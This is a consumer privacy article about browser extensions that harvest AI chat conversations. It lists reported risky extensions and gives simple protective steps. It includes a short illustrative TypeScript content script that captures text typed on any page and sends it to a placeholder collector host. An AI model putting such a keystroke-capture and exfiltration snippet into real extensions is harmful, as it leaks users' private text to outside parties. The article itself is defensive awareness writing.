Browser Extensions Can Expose Your Private AI Chats

Browser extensions can be incredibly useful. They block ads, improve productivity, add AI features, and promise better privacy. But new research shows that some extensions can quietly access and sell your private AI conversations, including chats with tools like ChatGPT and Google Gemini.

Security researchers and journalists have found that certain third-party browser extensions were collecting AI chat content and sending it to outside servers, where it could be used for marketing, analytics, or other commercial purposes (Forbes).

In simple terms: what you thought was a private AI conversation may not have been private at all.


Why This Matters to Everyday Users

Many people use AI tools for normal, everyday tasks, such as:

  • Writing emails or resumes
  • Planning trips or budgets
  • Asking health or personal questions
  • Brainstorming business or school ideas

If a browser extension has permission to “read and change data on websites,” it may also be able to read everything in an AI chat window, including both your questions and the AI’s responses. That means personal, sensitive, or confidential information can be exposed without users realizing it (1Password Blog).
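
For readers curious about the mechanics, the sketch below is a hypothetical illustration, not code from any real extension, of how a content script granted the “read and change data on all websites” permission could watch what you type on a page such as an AI chat. The function name and the server address are made up for illustration only.

    // Hypothetical content script sketch (TypeScript). A real extension would
    // declare a script like this in its manifest with a broad match pattern
    // such as "<all_urls>", which is what the "read and change data on all
    // websites" prompt corresponds to.
    function watchTypedText(): void {
      // Any keystroke in an input, textarea, or editable chat box on the page
      // fires an "input" event that the content script can observe.
      document.addEventListener("input", (event: Event) => {
        const target = event.target as HTMLElement;
        const text =
          target instanceof HTMLInputElement || target instanceof HTMLTextAreaElement
            ? target.value
            : target.innerText; // contenteditable chat boxes expose their text too

        // A malicious or compromised extension could quietly forward this text
        // to its own server; the address below is only a placeholder.
        void fetch("https://collector.example.invalid/log", {
          method: "POST",
          body: JSON.stringify({ site: location.hostname, text }),
        });
      });
    }

    watchTypedText();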

You don’t need technical knowledge, and you don’t have to do anything risky, for this to happen. In some cases, extensions started out legitimate and only changed behavior after a later update or after the developer’s account was compromised.


Browser Extensions That Have Been Flagged as Risky

Cybersecurity researchers have publicly identified multiple extensions that were compromised or caught collecting user data in unsafe ways. Some were removed or updated after discovery, but users who installed them earlier may have already been affected.

Examples of confirmed or reported risky extensions include:

  • Urban VPN (and related variants), which researchers found harvesting browsing activity and AI conversation data and sending it to remote servers (The Hacker News)
  • FreeVPN.One, which was reported to be capturing screenshots of user activity across websites (Tom’s Hardware)
  • Bard AI Chat (third-party extension, not Google’s official tool), identified in compromised extension campaigns (Malwarebytes)
  • ChatGPT for Google Meet, ChatGPT App, and ChatGPT Quick Access, which were included in large-scale extension hijacking attacks (Malwarebytes)
  • VPNCity and Internxt VPN, also listed among extensions affected by malicious update campaigns (Malwarebytes)

It’s worth noting that these extensions did not necessarily look unsafe when users installed them; in many cases, the problems appeared only after later updates.


How to Protect Yourself (No Technical Skills Needed)

You can reduce your risk with a few simple habits:

  • Remove extensions you don’t actively use
    If you haven’t used it in weeks, you probably don’t need it.
  • Be cautious with AI-branded extensions
    Many unofficial tools use popular names to appear trustworthy.
  • Check permissions before installing
    Avoid extensions that ask for full access to all websites unless absolutely necessary.
  • Stick to official tools when possible
    Built-in browser features and official integrations are generally safer than third-party add-ons.
  • Review extensions after updates
    An extension can change behavior over time without obvious warnings.

Final Takeaway

Browser extensions are among the easiest ways for personal data to leak online – not through hacking, but through silent access that users unknowingly grant. As AI tools become part of daily life, protecting your privacy means paying closer attention to what has access to your browser.

Privacy usually isn’t lost in one big moment.
It’s lost quietly – one extension at a time.
